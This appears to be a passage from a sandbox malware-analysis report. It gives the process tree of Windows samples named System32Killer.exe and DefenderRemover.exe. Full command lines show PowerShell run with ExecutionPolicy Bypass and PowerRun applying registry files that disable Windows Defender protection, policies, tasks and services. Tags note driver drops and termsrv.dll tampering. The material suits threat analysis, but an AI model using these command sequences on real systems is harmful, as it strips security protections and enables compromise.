PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104
PID 2168 wrote to memory of 2496	2168	chrome.exe	104

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Taremi (2).png"
1⤵
PID:5080

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Boot or Logon Autostart Execution: Print Processors
- Drops file in System32 directory
- Modifies termsrv.dll
PID:1528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb344cc40,0x7ffcb344cc4c,0x7ffcb344cc58
  2⤵
  PID:4716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:2284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2200,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2436 /prefetch:3
  2⤵
  PID:2624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2444 /prefetch:8
  2⤵
  PID:2496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:3356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3736,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4576 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4780 /prefetch:8
  2⤵
  PID:3284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4732 /prefetch:8
  2⤵
  PID:4132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3852,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5100 /prefetch:8
  2⤵
  PID:936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5228,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5240 /prefetch:8
  2⤵
  PID:1744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5364,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5356 /prefetch:1
  2⤵
  PID:2332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5164,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5600,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4756 /prefetch:8
  2⤵
  PID:1296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3244,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5592 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3300,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5552 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5904,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5260,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4972,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:4492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4712,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4688 /prefetch:8
  2⤵
  PID:2116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5200,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5752 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5780,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5888,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4708 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5380,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5868 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5480,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5476 /prefetch:8
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5792,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3256 /prefetch:8
  2⤵
  PID:3852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5772,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  PID:4092
- C:\Users\Admin\Downloads\System32Killer.exe
  "C:\Users\Admin\Downloads\System32Killer.exe"
  2⤵
  - Drops file in Drivers directory
  - Manipulates Digital Signatures
  - Boot or Logon Autostart Execution: Print Processors
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Modifies termsrv.dll
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5736,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4536 /prefetch:1
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=5464,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4068 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3492,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6096 /prefetch:8
  2⤵
  PID:3900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5560,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6196 /prefetch:8
  2⤵
  PID:4952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6232,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6376 /prefetch:8
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6244,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6516 /prefetch:8
  2⤵
  PID:2704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6240,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6656 /prefetch:8
  2⤵
  PID:728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6832,i,4479331301286311467,18032662485403257496,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5080 /prefetch:8
  2⤵
  PID:3600
- C:\Users\Admin\Downloads\DefenderRemover.exe
  "C:\Users\Admin\Downloads\DefenderRemover.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c .\Script_Run.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4808
  - - C:\Windows\SysWOW64\choice.exe
      choice /C:yas /N
      4⤵
      System Location Discovery: System Language Discovery
      PID:3324
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""RemoveSecHealthApp.ps1""' -Verb RunAs}"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1232
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "RemoveSecHealthApp.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4344
      - C:\Users\Admin\AppData\Local\Temp\F0AF4A10-0C6A-4994-AE83-9682BDB532CD\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\F0AF4A10-0C6A-4994-AE83-9682BDB532CD\dismhost.exe {C511BE84-55F8-4C21-809C-7BAA89BEF05F}
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableAntivirusProtection.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3128
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableAntivirusProtection.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3228
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableAntivirusProtection.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1260
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableAntivirusProtection.reg"
        7⤵
        Modifies Windows Defender Real-time Protection settings
        Runs .reg file with regedit
        
        PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderandSecurityCenterNotifications.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:728
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderandSecurityCenterNotifications.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1600
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderandSecurityCenterNotifications.reg"
        6⤵
        Executes dropped EXE
        
        PID:4568
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderandSecurityCenterNotifications.reg"
        7⤵
        Windows security bypass
        Runs .reg file with regedit
        
        PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderPolicies.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4396
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderPolicies.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4060
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderPolicies.reg"
        6⤵
        Executes dropped EXE
        
        PID:3316
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderPolicies.reg"
        7⤵
        Modifies Windows Defender Real-time Protection settings
        Runs .reg file with regedit
        
        PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\NomoreDelayandTimeouts.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1704
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\NomoreDelayandTimeouts.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4132
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\NomoreDelayandTimeouts.reg"
        6⤵
        Executes dropped EXE
        
        PID:3632
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\NomoreDelayandTimeouts.reg"
        7⤵
        Modifies data under HKEY_USERS
        Runs .reg file with regedit
        
        PID:2544
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemovalofWindowsDefenderAntivirus.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1160
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemovalofWindowsDefenderAntivirus.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4712
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemovalofWindowsDefenderAntivirus.reg"
        6⤵
        Executes dropped EXE
        
        PID:1540
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemovalofWindowsDefenderAntivirus.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:516
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveDefenderTasks.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4436
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveDefenderTasks.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:892
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveDefenderTasks.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1676
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveDefenderTasks.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoverofDefenderContextMenu.reg"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoverofDefenderContextMenu.reg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2512
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoverofDefenderContextMenu.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2292
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoverofDefenderContextMenu.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:3852
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveServices.reg"
      4⤵
      Executes dropped EXE
      PID:5116
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveServices.reg"
        5⤵
        Executes dropped EXE
        
        PID:4464
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveServices.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3660
        
        C:\Windows\regedit.exe
        
